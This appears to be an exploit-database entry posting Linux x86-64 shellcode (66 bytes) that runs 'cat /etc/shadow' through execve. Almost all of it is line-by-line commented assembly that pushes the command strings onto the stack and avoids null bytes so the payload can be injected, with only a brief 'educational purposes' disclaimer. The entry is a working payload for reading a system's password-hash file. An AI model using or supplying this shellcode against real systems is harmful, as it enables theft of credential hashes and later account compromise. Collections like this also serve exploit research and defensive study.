Exploits / Vulnerability Discovered : 2021-02-09 |
Type : shellcode |
Platform : linux_x86-64
This exploit / vulnerability Linux/x64 execve "cat /etc/shadow" shellcode (66 bytes) is for educational purposes only and if it is used you will do on your own risk!
xor rax, rax ; Zeroes out RAX.
xor rbp, rbp ; Zeroes out RBP.
push rax ; Pushes RAX's NULL-DWORD.
mov rbp, 0x776f646168732f63 ; Moves value "wodahs/c" into RBP.
push rbp ; Pushes the vaueof RBP into the Stack.
mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP.
push rbp ; Pushes the vaue of RBP into the Stack.
mov rbp, rsp ; Copies the value of the Stack into RBP.
push rax ; Pushes RAX's NULL-DWORD.
mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX.
push rbx ; Pushes the vaue of RBX into the Stack.
mov rbx, rsp ; Copies the value of the Stack into RBX.
mov rdi, rsp ; Copies the value of the Stack into RDI.
push rax ; Pushes RAX's NULL-DWORD.
mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.
push rbp ; Pushes the vaue of RBP into the Stack.
push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow".
mov rsi, rsp ; Copies this entire string from the Stack into RSI.
push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format).
pop ax ; Pops this value into AX so there are no NULLs.
syscall ; The syscall is executed.
*/